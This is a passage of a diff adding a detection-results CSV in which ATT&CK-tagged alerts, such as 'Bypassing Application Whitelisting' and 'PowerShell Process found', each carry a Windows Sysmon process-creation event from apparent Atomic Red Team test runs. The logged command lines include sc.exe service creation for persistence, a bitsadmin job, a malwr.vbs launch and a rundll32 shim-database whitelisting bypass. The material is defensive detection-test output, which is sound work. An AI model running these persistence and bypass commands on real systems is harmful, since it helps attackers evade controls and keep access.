+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:44:08.185344Z"">
+    </TimeCreated>
+    <EventRecordID>3577</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Persistence or Exec - Services Management</Data>
+    <Data Name=""UtcTime"">2019-07-19 14:44:08.181</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D738-5D31-0000-001098A22600</Data>
+    <Data Name=""ProcessId"">1700</Data>
+    <Data Name=""Image"">C:\Windows\System32\sc.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Service Control Manager Configuration Tool</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">sc.exe  create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D738-5D31-0000-001046A02600</Data>
+    <Data Name=""ParentProcessId"">4216</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547448.185344,2019-07-19T18:44:08.185344+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:44:08.161838Z"">
+    </TimeCreated>
+    <EventRecordID>3576</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:44:08.146</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D738-5D31-0000-001046A02600</Data>
+    <Data Name=""ProcessId"">4216</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553031677.339046,2019-03-20T01:41:17.339046+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T21:41:17.339046Z"">
+    </TimeCreated>
+    <EventRecordID>1966563</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 21:41:17.288</Data>
+    <Data Name=""ProcessGuid"">365ABB72-61FD-5C91-0000-0010536A1200</Data>
+    <Data Name=""ProcessId"">2340</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.EXE /c malwr.vbs</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-528D-5C91-0000-001062560000</Data>
+    <Data Name=""ParentProcessId"">484</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[ T1086 ]  Powershell with Suspicious Argument,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot;) in directory : ( c:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:43:03.303217Z"">
+    </TimeCreated>
+    <EventRecordID>3574</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:43:03.271</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ProcessId"">3912</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">powershell</Data>
+    <Data Name=""CurrentDirectory"">c:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6ED-5D31-0000-0010C88A2500</Data>
+    <Data Name=""ParentProcessId"">3764</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:43:03.303217Z"">
+    </TimeCreated>
+    <EventRecordID>3574</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:43:03.271</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ProcessId"">3912</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">powershell</Data>
+    <Data Name=""CurrentDirectory"">c:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6ED-5D31-0000-0010C88A2500</Data>
+    <Data Name=""ParentProcessId"">3764</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547383.303217,2019-07-19T18:43:03.303217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:42:53.295578Z"">
+    </TimeCreated>
+    <EventRecordID>3573</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:42:53.277</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D6ED-5D31-0000-0010C88A2500</Data>
+    <Data Name=""ProcessId"">3764</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D4B8-5D31-0000-0010A8CE0600</Data>
+    <Data Name=""ParentProcessId"">4416</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547710.660877,2019-07-19T18:48:30.660877+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /create AtomicBITS&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:30.640915Z"">
+    </TimeCreated>
+    <EventRecordID>3657</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:30.619</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D83E-5D31-0000-0010F0D02E00</Data>
+    <Data Name=""ProcessId"">752</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /create AtomicBITS&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T21:22:28.886411Z"">
+    </TimeCreated>
+    <EventRecordID>1966541</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 21:22:28.806</Data>
+    <Data Name=""ProcessGuid"">365ABB72-5D94-5C91-0000-001080E90F00</Data>
+    <Data Name=""ProcessId"">3840</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\AppPatch\Custom\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-543D-5C91-0000-001099A60300</Data>
+    <Data Name=""ParentProcessId"">2984</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T21:22:28.886411Z"">
+    </TimeCreated>
+    <EventRecordID>1966541</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 21:22:28.806</Data>
+    <Data Name=""ProcessGuid"">365ABB72-5D94-5C91-0000-001080E90F00</Data>
+    <Data Name=""ProcessId"">3840</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\AppPatch\Custom\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-543D-5C91-0000-001099A60300</Data>
+    <Data Name=""ParentProcessId"">2984</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547710.640915,2019-07-19T18:48:30.640915+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:05.365622Z"">
+    </TimeCreated>
+    <EventRecordID>3656</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:05.349</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D825-5D31-0000-0010CF222C00</Data>
+    <Data Name=""ProcessId"">5808</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
